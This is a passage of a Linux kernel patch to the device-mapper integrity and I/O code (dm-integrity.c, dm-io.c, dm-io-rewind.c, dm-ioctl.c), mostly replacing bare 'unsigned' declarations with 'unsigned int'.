+ 				bi_size -= this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+-				bi_sector += this_step_blocks << ic->sb->log2_sectors_per_block;
+ 			}
+ 
+ 			if (likely(checksums != checksums_onstack))
+@@ -1770,7 +1763,7 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+-			unsigned pos;
++			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+@@ -1823,13 +1816,13 @@ again:
+ 		if (bip) {
+ 			struct bio_vec biv;
+ 			struct bvec_iter iter;
+-			unsigned data_to_process = dio->range.n_sectors;
++			unsigned int data_to_process = dio->range.n_sectors;
+ 			sector_to_block(ic, data_to_process);
+ 			data_to_process *= ic->tag_size;
+ 
+ 			bip_for_each_vec(biv, bip, iter) {
+ 				unsigned char *tag;
+-				unsigned this_len;
++				unsigned int this_len;
+ 
+ 				BUG_ON(PageHighMem(biv.bv_page));
+ 				tag = bvec_virt(&biv);
+@@ -1867,7 +1860,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	if (unlikely(dio->op == REQ_OP_DISCARD)) {
+ 		if (ti->max_io_len) {
+ 			sector_t sec = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-			unsigned log2_max_io_len = __fls(ti->max_io_len);
++			unsigned int log2_max_io_len = __fls(ti->max_io_len);
+ 			sector_t start_boundary = sec >> log2_max_io_len;
+ 			sector_t end_boundary = (sec + bio_sectors(bio) - 1) >> log2_max_io_len;
+ 			if (start_boundary < end_boundary) {
+@@ -1897,7 +1890,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 		      ic->provided_data_sectors);
+ 		return DM_MAPIO_KILL;
+ 	}
+-	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned)(ic->sectors_per_block - 1))) {
++	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned int)(ic->sectors_per_block - 1))) {
+ 		DMERR("Bio not aligned on %u sectors: 0x%llx, 0x%x",
+ 		      ic->sectors_per_block,
+ 		      dio->range.logical_sector, bio_sectors(bio));
+@@ -1919,7 +1912,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	bip = bio_integrity(bio);
+ 	if (!ic->internal_hash) {
+ 		if (bip) {
+-			unsigned wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
++			unsigned int wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
+ 			if (ic->log2_tag_size >= 0)
+ 				wanted_tag_size <<= ic->log2_tag_size;
+ 			else
+@@ -1949,11 +1942,11 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static bool __journal_read_write(struct dm_integrity_io *dio, struct bio *bio,
+-				 unsigned journal_section, unsigned journal_entry)
++				 unsigned int journal_section, unsigned int journal_entry)
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	sector_t logical_sector;
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 
+ 	logical_sector = dio->range.logical_sector;
+ 	n_sectors = dio->range.n_sectors;
+@@ -1976,7 +1969,7 @@ retry_kmap:
+ 			if (unlikely(dio->op == REQ_OP_READ)) {
+ 				struct journal_sector *js;
+ 				char *mem_ptr;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				if (unlikely(journal_entry_is_inprogress(je))) {
+ 					flush_dcache_page(bv.bv_page);
+@@ -2013,12 +2006,12 @@ retry_kmap:
+ 
+ 			if (!ic->internal_hash) {
+ 				struct bio_integrity_payload *bip = bio_integrity(bio);
+-				unsigned tag_todo = ic->tag_size;
++				unsigned int tag_todo = ic->tag_size;
+ 				char *tag_ptr = journal_entry_tag(ic, je);
+ 
+ 				if (bip) do {
+ 					struct bio_vec biv = bvec_iter_bvec(bip->bip_vec, bip->bip_iter);
+-					unsigned tag_now = min(biv.bv_len, tag_todo);
++					unsigned int tag_now = min(biv.bv_len, tag_todo);
+ 					char *tag_addr;
+ 					BUG_ON(PageHighMem(biv.bv_page));
+ 					tag_addr = bvec_virt(&biv);
+@@ -2037,7 +2030,7 @@ retry_kmap:
+ 
+ 			if (likely(dio->op == REQ_OP_WRITE)) {
+ 				struct journal_sector *js;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				js = access_journal_data(ic, journal_section, journal_entry);
+ 				memcpy(js, mem + bv.bv_offset, ic->sectors_per_block << SECTOR_SHIFT);
+@@ -2048,7 +2041,7 @@ retry_kmap:
+ 				} while (++s < ic->sectors_per_block);
+ 
+ 				if (ic->internal_hash) {
+-					unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++					unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 					if (unlikely(digest_size > ic->tag_size)) {
+ 						char checksums_onstack[HASH_MAX_DIGESTSIZE];
+ 						integrity_sector_checksum(ic, logical_sector, (char *)js, checksums_onstack);
+@@ -2105,8 +2098,8 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+-	unsigned journal_section, journal_entry;
+-	unsigned journal_read_pos;
++	unsigned int journal_section, journal_entry;
++	unsigned int journal_read_pos;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2131,8 +2124,8 @@ retry:
+ 	journal_read_pos = NOT_FOUND;
+ 	if (ic->mode == 'J' && likely(dio->op != REQ_OP_DISCARD)) {
+ 		if (dio->op == REQ_OP_WRITE) {
+-			unsigned next_entry, i, pos;
+-			unsigned ws, we, range_sectors;
++			unsigned int next_entry, i, pos;
++			unsigned int ws, we, range_sectors;
+ 
+ 			dio->range.n_sectors = min(dio->range.n_sectors,
+ 						   (sector_t)ic->free_sectors << ic->sb->log2_sectors_per_block);
+@@ -2185,8 +2178,8 @@ retry:
+ 				if (unlikely(dio->range.n_sectors > next_sector - dio->range.logical_sector))
+ 					dio->range.n_sectors = next_sector - dio->range.logical_sector;
+ 			} else {
+-				unsigned i;
+-				unsigned jp = journal_read_pos + 1;
++				unsigned int i;
++				unsigned int jp = journal_read_pos + 1;
+ 				for (i = ic->sectors_per_block; i < dio->range.n_sectors; i += ic->sectors_per_block, jp++) {
+ 					if (!test_journal_node(ic, jp, dio->range.logical_sector + i))
+ 						break;
+@@ -2218,7 +2211,7 @@ offload_to_thread:
+ 		 */
+ 		if (journal_read_pos != NOT_FOUND) {
+ 			sector_t next_sector;
+-			unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++			unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 			if (unlikely(new_pos != journal_read_pos)) {
+ 				remove_range_unlocked(ic, &dio->range);
+ 				goto retry;
+@@ -2227,7 +2220,7 @@ offload_to_thread:
+ 	}
+ 	if (ic->mode == 'J' && likely(dio->op == REQ_OP_DISCARD) && !discard_retried) {
+ 		sector_t next_sector;
+-		unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++		unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 		if (unlikely(new_pos != NOT_FOUND) ||
+ 		    unlikely(next_sector < dio->range.logical_sector - dio->range.n_sectors)) {
+ 			remove_range_unlocked(ic, &dio->range);
+@@ -2354,8 +2347,8 @@ static void pad_uncommitted(struct dm_integrity_c *ic)
+ static void integrity_commit(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, commit_work);
+-	unsigned commit_start, commit_sections;
+-	unsigned i, j, n;
++	unsigned int commit_start, commit_sections;
++	unsigned int i, j, n;
+ 	struct bio *flushes;
+ 
+ 	del_timer(&ic->autocommit_timer);
+@@ -2433,17 +2426,17 @@ static void complete_copy_from_journal(unsigned long error, void *context)
+ static void restore_last_bytes(struct dm_integrity_c *ic, struct journal_sector *js,
+ 			       struct journal_entry *je)
+ {
+-	unsigned s = 0;
++	unsigned int s = 0;
+ 	do {
+ 		js->commit_id = je->last_bytes[s];
+ 		js++;
+ 	} while (++s < ic->sectors_per_block);
+ }
+ 
+-static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+-			     unsigned write_sections, bool from_replay)
++static void do_journal_write(struct dm_integrity_c *ic, unsigned int write_start,
++			     unsigned int write_sections, bool from_replay)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 	struct journal_completion comp;
+ 	struct blk_plug plug;
+ 
+@@ -2462,9 +2455,9 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 		for (j = 0; j < ic->journal_section_entries; j++) {
+ 			struct journal_entry *je = access_journal_entry(ic, i, j);
+ 			sector_t sec, area, offset;
+-			unsigned k, l, next_loop;
++			unsigned int k, l, next_loop;
+ 			sector_t metadata_block;
+-			unsigned metadata_offset;
++			unsigned int metadata_offset;
+ 			struct journal_io *io;
+ 
+ 			if (journal_entry_is_unused(je))
+@@ -2472,7 +2465,7 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 			BUG_ON(unlikely(journal_entry_is_inprogress(je)) && !from_replay);
+ 			sec = journal_entry_get_sector(je);
+ 			if (unlikely(from_replay)) {
+-				if (unlikely(sec & (unsigned)(ic->sectors_per_block - 1))) {
++				if (unlikely(sec & (unsigned int)(ic->sectors_per_block - 1))) {
+ 					dm_integrity_io_error(ic, "invalid sector in journal", -EIO);
+ 					sec &= ~(sector_t)(ic->sectors_per_block - 1);
+ 				}
+@@ -2590,9 +2583,9 @@ skip_io:
+ static void integrity_writer(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, writer_work);
+-	unsigned write_start, write_sections;
++	unsigned int write_start, write_sections;
+ 
+-	unsigned prev_free_sectors;
++	unsigned int prev_free_sectors;
+ 
+ 	spin_lock_irq(&ic->endio_wait.lock);
+ 	write_start = ic->committed_section;
+@@ -2639,12 +2632,12 @@ static void integrity_recalc(struct work_struct *w)
+ 	struct dm_io_region io_loc;
+ 	sector_t area, offset;
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 	sector_t logical_sector, n_sectors;
+ 	__u8 *t;
+-	unsigned i;
++	unsigned int i;
+ 	int r;
+-	unsigned super_counter = 0;
++	unsigned int super_counter = 0;
+ 
+ 	DEBUG_print("start recalculation... (position %llx)\n", le64_to_cpu(ic->sb->recalc_sector));
+ 
+@@ -2668,7 +2661,7 @@ next_chunk:
+ 	get_area_and_offset(ic, range.logical_sector, &area, &offset);
+ 	range.n_sectors = min((sector_t)RECALC_SECTORS, ic->provided_data_sectors - range.logical_sector);
+ 	if (!ic->meta_dev)
+-		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned)offset);
++		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned int)offset);
+ 
+ 	add_new_range_and_wait(ic, &range);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+@@ -2859,10 +2852,10 @@ static void bitmap_flush_work(struct work_struct *work)
+ }
+ 
+ 
+-static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+-			 unsigned n_sections, unsigned char commit_seq)
++static void init_journal(struct dm_integrity_c *ic, unsigned int start_section,
++			 unsigned int n_sections, unsigned char commit_seq)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 
+ 	if (!n_sections)
+ 		return;
+@@ -2885,7 +2878,7 @@ static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+ 	write_journal(ic, start_section, n_sections);
+ }
+ 
+-static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, commit_id_t id)
++static int find_commit_seq(struct dm_integrity_c *ic, unsigned int i, unsigned int j, commit_id_t id)
+ {
+ 	unsigned char k;
+ 	for (k = 0; k < N_COMMIT_IDS; k++) {
+@@ -2898,11 +2891,11 @@ static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, co
+ 
+ static void replay_journal(struct dm_integrity_c *ic)
+ {
+-	unsigned i, j;
++	unsigned int i, j;
+ 	bool used_commit_ids[N_COMMIT_IDS];
+-	unsigned max_commit_id_sections[N_COMMIT_IDS];
+-	unsigned write_start, write_sections;
+-	unsigned continue_section;
++	unsigned int max_commit_id_sections[N_COMMIT_IDS];
++	unsigned int write_start, write_sections;
++	unsigned int continue_section;
+ 	bool journal_empty;
+ 	unsigned char unused, last_used, want_commit_seq;
+ 
+@@ -3020,7 +3013,7 @@ brk:
+ 		ic->commit_seq = want_commit_seq;
+ 		DEBUG_print("continuing from section %u, commit seq %d\n", write_start, ic->commit_seq);
+ 	} else {
+-		unsigned s;
++		unsigned int s;
+ 		unsigned char erase_seq;
+ clear_journal:
+ 		DEBUG_print("clearing journal\n");
+@@ -3252,10 +3245,10 @@ static void dm_integrity_resume(struct dm_target *ti)
+ }
+ 
+ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+-				unsigned status_flags, char *result, unsigned maxlen)
++				unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_integrity_c *ic = (struct dm_integrity_c *)ti->private;
+-	unsigned arg_count;
++	unsigned int arg_count;
+ 	size_t sz = 0;
+ 
+ 	switch (type) {
+@@ -3305,7 +3298,7 @@ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+ 		DMEMIT(" interleave_sectors:%u", 1U << ic->sb->log2_interleave_sectors);
+ 		DMEMIT(" buffer_sectors:%u", 1U << ic->log2_buffer_sectors);
+ 		if (ic->mode == 'J') {
+-			DMEMIT(" journal_watermark:%u", (unsigned)watermark_percentage);
++			DMEMIT(" journal_watermark:%u", (unsigned int)watermark_percentage);
+ 			DMEMIT(" commit_time:%u", ic->autocommit_msec);
+ 		}
+ 		if (ic->mode == 'B') {
+@@ -3384,7 +3377,7 @@ static void dm_integrity_io_hints(struct dm_target *ti, struct queue_limits *lim
+ 
+ static void calculate_journal_section_size(struct dm_integrity_c *ic)
+ {
+-	unsigned sector_space = JOURNAL_SECTOR_DATA;
++	unsigned int sector_space = JOURNAL_SECTOR_DATA;
+ 
+ 	ic->journal_sections = le32_to_cpu(ic->sb->journal_sections);
+ 	ic->journal_entry_size = roundup(offsetof(struct journal_entry, last_bytes[ic->sectors_per_block]) + ic->tag_size,
+@@ -3461,9 +3454,10 @@ static void get_provided_data_sectors(struct dm_integrity_c *ic)
+ 	}
+ }
+ 
+-static int initialize_superblock(struct dm_integrity_c *ic, unsigned journal_sectors, unsigned interleave_sectors)
++static int initialize_superblock(struct dm_integrity_c *ic,
++				 unsigned int journal_sectors, unsigned int interleave_sectors)
+ {
+-	unsigned journal_sections;
++	unsigned int journal_sections;
+ 	int test_bit;
+ 
+ 	memset(ic->sb, 0, SB_SECTORS << SECTOR_SHIFT);
+@@ -3548,7 +3542,7 @@ static void dm_integrity_set(struct dm_target *ti, struct dm_integrity_c *ic)
+ 
+ static void dm_integrity_free_page_list(struct page_list *pl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!pl)
+ 		return;
+@@ -3557,10 +3551,10 @@ static void dm_integrity_free_page_list(struct page_list *pl)
+ 	kvfree(pl);
+ }
+ 
+-static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
++static struct page_list *dm_integrity_alloc_page_list(unsigned int n_pages)
+ {
+ 	struct page_list *pl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	pl = kvmalloc_array(n_pages + 1, sizeof(struct page_list), GFP_KERNEL | __GFP_ZERO);
+ 	if (!pl)
+@@ -3583,7 +3577,7 @@ static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
+ 
+ static void dm_integrity_free_journal_scatterlist(struct dm_integrity_c *ic, struct scatterlist **sl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < ic->journal_sections; i++)
+ 		kvfree(sl[i]);
+ 	kvfree(sl);
+@@ -3593,7 +3587,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 								   struct page_list *pl)
+ {
+ 	struct scatterlist **sl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	sl = kvmalloc_array(ic->journal_sections,
+ 			    sizeof(struct scatterlist *),
+@@ -3603,10 +3597,10 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 
+ 	for (i = 0; i < ic->journal_sections; i++) {
+ 		struct scatterlist *s;
+-		unsigned start_index, start_offset;
+-		unsigned end_index, end_offset;
+-		unsigned n_pages;
+-		unsigned idx;
++		unsigned int start_index, start_offset;
++		unsigned int end_index, end_offset;
++		unsigned int n_pages;
++		unsigned int idx;
+ 
+ 		page_list_location(ic, i, 0, &start_index, &start_offset);
+ 		page_list_location(ic, i, ic->journal_section_sectors - 1,
+@@ -3624,7 +3618,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 		sg_init_table(s, n_pages);
+ 		for (idx = start_index; idx <= end_index; idx++) {
+ 			char *va = lowmem_page_address(pl[idx].page);
+-			unsigned start = 0, end = PAGE_SIZE;
++			unsigned int start = 0, end = PAGE_SIZE;
+ 			if (idx == start_index)
+ 				start = start_offset;
+ 			if (idx == end_index)
+@@ -3711,7 +3705,7 @@ static int get_mac(struct crypto_shash **hash, struct alg_spec *a, char **error,
+ static int create_journal(struct dm_integrity_c *ic, char **error)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	__u64 journal_pages, journal_desc_size, journal_tree_size;
+ 	unsigned char *crypt_data = NULL, *crypt_iv = NULL;
+ 	struct skcipher_request *req = NULL;
+@@ -3738,7 +3732,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 		goto bad;
+ 	}
+ 	if (ic->journal_crypt_alg.alg_string) {
+-		unsigned ivsize, blocksize;
++		unsigned int ivsize, blocksize;
+ 		struct journal_completion comp;
+ 
+ 		comp.ic = ic;
+@@ -3827,7 +3821,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 			crypto_free_skcipher(ic->journal_crypt);
+ 			ic->journal_crypt = NULL;
+ 		} else {
+-			unsigned crypt_len = roundup(ivsize, blocksize);
++			unsigned int crypt_len = roundup(ivsize, blocksize);
+ 
+ 			req = skcipher_request_alloc(ic->journal_crypt, GFP_KERNEL);
+ 			if (!req) {
+@@ -3915,7 +3909,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 	}
+ 
+ 	for (i = 0; i < N_COMMIT_IDS; i++) {
+-		unsigned j;
++		unsigned int j;
+ retest_commit_id:
+ 		for (j = 0; j < i; j++) {
+ 			if (ic->commit_ids[j] == ic->commit_ids[i]) {
+@@ -3969,17 +3963,17 @@ bad:
+  *		journal_mac
+  *		recalculate
+  */
+-static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_integrity_c *ic;
+ 	char dummy;
+ 	int r;
+-	unsigned extra_args;
++	unsigned int extra_args;
+ 	struct dm_arg_set as;
+ 	static const struct dm_arg _args[] = {
+ 		{0, 18, "Invalid number of feature args"},
+ 	};
+-	unsigned journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
++	unsigned int journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
+ 	bool should_write_sb;
+ 	__u64 threshold;
+ 	unsigned long long start;
+@@ -4058,7 +4052,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	while (extra_args--) {
+ 		const char *opt_string;
+-		unsigned val;
++		unsigned int val;
+ 		unsigned long long llval;
+ 		opt_string = dm_shift_arg(&as);
+ 		if (!opt_string) {
+@@ -4391,7 +4385,7 @@ try_smaller_buffer:
+ 	DEBUG_print("	journal_entries_per_sector %u\n", ic->journal_entries_per_sector);
+ 	DEBUG_print("	journal_section_entries %u\n", ic->journal_section_entries);
+ 	DEBUG_print("	journal_section_sectors %u\n", ic->journal_section_sectors);
+-	DEBUG_print("	journal_sections %u\n", (unsigned)le32_to_cpu(ic->sb->journal_sections));
++	DEBUG_print("	journal_sections %u\n", (unsigned int)le32_to_cpu(ic->sb->journal_sections));
+ 	DEBUG_print("	journal_entries %u\n", ic->journal_entries);
+ 	DEBUG_print("	log2_interleave_sectors %d\n", ic->sb->log2_interleave_sectors);
+ 	DEBUG_print("	data_device_sectors 0x%llx\n", bdev_nr_sectors(ic->dev->bdev));
+@@ -4465,8 +4459,8 @@ try_smaller_buffer:
+ 	}
+ 
+ 	if (ic->mode == 'B') {
+-		unsigned i;
+-		unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++		unsigned int i;
++		unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+ 
+ 		ic->recalc_bitmap = dm_integrity_alloc_page_list(n_bitmap_pages);
+ 		if (!ic->recalc_bitmap) {
+@@ -4486,7 +4480,7 @@ try_smaller_buffer:
+ 		INIT_DELAYED_WORK(&ic->bitmap_flush_work, bitmap_flush_work);
+ 		for (i = 0; i < ic->n_bitmap_blocks; i++) {
+ 			struct bitmap_block_status *bbs = &ic->bbs[i];
+-			unsigned sector, pl_index, pl_offset;
++			unsigned int sector, pl_index, pl_offset;
+ 
+ 			INIT_WORK(&bbs->work, bitmap_block_work);
+ 			bbs->ic = ic;
+@@ -4523,7 +4517,7 @@ try_smaller_buffer:
+ 			goto bad;
+ 	}
+ 	if (ic->mode == 'B') {
+-		unsigned max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
++		unsigned int max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
+ 		if (!max_io_len)
+ 			max_io_len = 1U << 31;
+ 		DEBUG_print("max_io_len: old %u, new %u\n", ti->max_io_len, max_io_len);
+@@ -4594,7 +4588,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	if (ic->journal_io_scatterlist)
+ 		dm_integrity_free_journal_scatterlist(ic, ic->journal_io_scatterlist);
+ 	if (ic->sk_requests) {
+-		unsigned i;
++		unsigned int i;
+ 
+ 		for (i = 0; i < ic->journal_sections; i++) {
+ 			struct skcipher_request *req = ic->sk_requests[i];
+diff --git a/drivers/md/dm-io-rewind.c b/drivers/md/dm-io-rewind.c
+index 0db53ccb94ba7..773c4cff8b89f 100644
+--- a/drivers/md/dm-io-rewind.c
++++ b/drivers/md/dm-io-rewind.c
+@@ -57,7 +57,7 @@ static void dm_bio_integrity_rewind(struct bio *bio, unsigned int bytes_done)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+ 	struct blk_integrity *bi = blk_get_integrity(bio->bi_bdev->bd_disk);
+-	unsigned bytes = bio_integrity_bytes(bi, bytes_done >> 9);
++	unsigned int bytes = bio_integrity_bytes(bi, bytes_done >> 9);
+ 
+ 	bip->bip_iter.bi_sector -= bio_integrity_intervals(bi, bytes_done >> 9);
+ 	dm_bvec_iter_rewind(bip->bip_vec, &bip->bip_iter, bytes);
+@@ -131,7 +131,7 @@ static inline void dm_bio_rewind_iter(const struct bio *bio,
+  * rewinding from end of bio and restoring its original position.
+  * Caller is also responsibile for restoring bio's size.
+  */
+-static void dm_bio_rewind(struct bio *bio, unsigned bytes)
++static void dm_bio_rewind(struct bio *bio, unsigned int bytes)
+ {
+ 	if (bio_integrity(bio))
+ 		dm_bio_integrity_rewind(bio, bytes);
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index 7835645334593..e488b05e35fa3 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -48,7 +48,7 @@ static struct kmem_cache *_dm_io_cache;
+ struct dm_io_client *dm_io_client_create(void)
+ {
+ 	struct dm_io_client *client;
+-	unsigned min_ios = dm_get_reserved_bio_based_ios();
++	unsigned int min_ios = dm_get_reserved_bio_based_ios();
+ 	int ret;
+ 
+ 	client = kzalloc(sizeof(*client), GFP_KERNEL);
+@@ -88,7 +88,7 @@ EXPORT_SYMBOL(dm_io_client_destroy);
+  * bi_private.
+  *---------------------------------------------------------------*/
+ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+-				       unsigned region)
++				       unsigned int region)
+ {
+ 	if (unlikely(!IS_ALIGNED((unsigned long)io, DM_IO_MAX_REGIONS))) {
+ 		DMCRIT("Unaligned struct io pointer %p", io);
+@@ -99,7 +99,7 @@ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+ }
+ 
+ static void retrieve_io_and_region_from_bio(struct bio *bio, struct io **io,
+-				       unsigned *region)
++				       unsigned int *region)
+ {
+ 	unsigned long val = (unsigned long)bio->bi_private;
+ 
+@@ -137,7 +137,7 @@ static void dec_count(struct io *io, unsigned int region, blk_status_t error)
+ static void endio(struct bio *bio)
+ {
+ 	struct io *io;
+-	unsigned region;
++	unsigned int region;
+ 	blk_status_t error;
+ 
+ 	if (bio->bi_status && bio_data_dir(bio) == READ)
+@@ -160,11 +160,11 @@ static void endio(struct bio *bio)
+  *---------------------------------------------------------------*/
+ struct dpages {
+ 	void (*get_page)(struct dpages *dp,
+-			 struct page **p, unsigned long *len, unsigned *offset);
++			 struct page **p, unsigned long *len, unsigned int *offset);
+ 	void (*next_page)(struct dpages *dp);
+ 
+ 	union {
+-		unsigned context_u;
++		unsigned int context_u;
+ 		struct bvec_iter context_bi;
+ 	};
+ 	void *context_ptr;
+@@ -177,9 +177,9 @@ struct dpages {
+  * Functions for getting the pages from a list.
+  */
+ static void list_get_page(struct dpages *dp,
+-		  struct page **p, unsigned long *len, unsigned *offset)
++		  struct page **p, unsigned long *len, unsigned int *offset)
+ {
+-	unsigned o = dp->context_u;
++	unsigned int o = dp->context_u;
+ 	struct page_list *pl = (struct page_list *) dp->context_ptr;
+ 
+ 	*p = pl->page;
+@@ -194,7 +194,7 @@ static void list_next_page(struct dpages *dp)
+ 	dp->context_u = 0;
+ }
+ 
+-static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offset)
++static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned int offset)
+ {
+ 	dp->get_page = list_get_page;
+ 	dp->next_page = list_next_page;
+@@ -206,7 +206,7 @@ static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offse
+  * Functions for getting the pages from a bvec.
+  */
+ static void bio_get_page(struct dpages *dp, struct page **p,
+-			 unsigned long *len, unsigned *offset)
++			 unsigned long *len, unsigned int *offset)
+ {
+ 	struct bio_vec bvec = bvec_iter_bvec((struct bio_vec *)dp->context_ptr,
+ 					     dp->context_bi);
+@@ -244,7 +244,7 @@ static void bio_dp_init(struct dpages *dp, struct bio *bio)
+  * Functions for getting the pages from a VMA.
+  */
+ static void vm_get_page(struct dpages *dp,
+-		 struct page **p, unsigned long *len, unsigned *offset)
++		 struct page **p, unsigned long *len, unsigned int *offset)
+ {
+ 	*p = vmalloc_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -269,7 +269,7 @@ static void vm_dp_init(struct dpages *dp, void *data)
+  * Functions for getting the pages from kernel memory.
+  */
+ static void km_get_page(struct dpages *dp, struct page **p, unsigned long *len,
+-			unsigned *offset)
++			unsigned int *offset)
+ {
+ 	*p = virt_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -293,15 +293,15 @@ static void km_dp_init(struct dpages *dp, void *data)
+ /*-----------------------------------------------------------------
+  * IO routines that accept a list of pages.
+  *---------------------------------------------------------------*/
+-static void do_region(const blk_opf_t opf, unsigned region,
++static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+ 		      struct io *io)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+ 	unsigned long len;
+-	unsigned offset;
+-	unsigned num_bvecs;
++	unsigned int offset;
++	unsigned int num_bvecs;
+ 	sector_t remaining = where->count;
+ 	struct request_queue *q = bdev_get_queue(where->bdev);
+ 	sector_t num_sectors;
+@@ -508,7 +508,7 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ 	return 0;
+ }
+ 
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 	  struct dm_io_region *where, unsigned long *sync_error_bits)
+ {
+ 	int r;
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index fdb7846a97a40..41d55218b0764 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -31,7 +31,7 @@ struct dm_file {
+ 	 * poll will wait until the global event number is greater than
+ 	 * this value.
+ 	 */
+-	volatile unsigned global_event_nr;
++	volatile unsigned int global_event_nr;
+ };
+ 
+ /*-----------------------------------------------------------------
+@@ -413,7 +413,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 	struct hash_cell *hc;
+ 	struct dm_table *table;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 	int srcu_idx;
+ 
+ 	/*
+@@ -1021,7 +1021,7 @@ static int dev_rename(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 	int r;
